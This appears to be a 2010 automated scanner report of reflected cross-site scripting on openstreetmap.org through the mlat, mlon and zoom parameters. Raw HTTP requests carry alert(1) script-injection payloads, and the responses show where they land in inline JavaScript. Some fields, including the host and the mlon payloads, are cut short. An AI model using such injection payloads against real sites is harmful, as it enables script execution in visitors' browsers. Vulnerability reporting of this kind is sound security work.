1. Cross-site scripting (reflected)
1.1. http://www.openstreetmap.org/ [mlat parameter]
1.2. http://www.openstreetmap.org/ [mlon parameter]
1.3. http://www.openstreetmap.org/ [zoom parameter]
Severity: | High |
Confidence: | Certain |
Host: | http://www.openstreetmap |
Path: | / |
GET /?mlat=37.762352c9f04%3balert(1)/ Host: www.openstreetmap.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:46:24 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.0 Vary: Accept-Language,Accept ETag: "98ed9f7887f21c8933f Content-Language: en X-Runtime: 57 Cache-Control: private, max-age=0, must-revalidate Set-Cookie: _osm_session=3ab760d Content-Length: 13620 Status: 200 Connection: close Content-Type: text/html; charset=utf-8 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... map.dataLayer.events map.addLayer(map var centre = new OpenLayers.LonLat(-122 var zoom = 16; setMapCenter(centre, zoom); updateLocation(); marker = addMarkerToMap(new OpenLayers.LonLat(-122 ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.openstreetmap |
Path: | / |
GET /?mlat=37.762352&mlon= Host: www.openstreetmap.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:46:34 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.0 Vary: Accept-Language,Accept ETag: "ae2ac1faa7b8fe0f182 Content-Language: en X-Runtime: 67 Cache-Control: private, max-age=0, must-revalidate Set-Cookie: _osm_session=2746ff4 Content-Length: 13620 Status: 200 Connection: close Content-Type: text/html; charset=utf-8 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... alse }); map.dataLayer.events map.addLayer(map var centre = new OpenLayers.LonLat(-122 var zoom = 16; setMapCenter(centre, zoom); updateLocation(); marker = addMarkerToMap(new OpenLayers.LonLat(-122 ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.openstreetmap |
Path: | / |
GET /?mlat=37.762352&mlon= Host: www.openstreetmap.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:46:40 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.0 Vary: Accept-Language,Accept ETag: "daa01e483bd0a0366fd Content-Language: en X-Runtime: 74 Cache-Control: private, max-age=0, must-revalidate Set-Cookie: _osm_session=6f0431e Content-Length: 13593 Status: 200 Connection: close Content-Type: text/html; charset=utf-8 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... .register("visibilit map.addLayer(map var centre = new OpenLayers.LonLat(-122 var zoom = 1620e64;alert(1)/ setMapCenter(centre, zoom); updateLocation(); marker = addMarkerToMap(new OpenLayers.LonLat(-122 map.event ...[SNIP]... |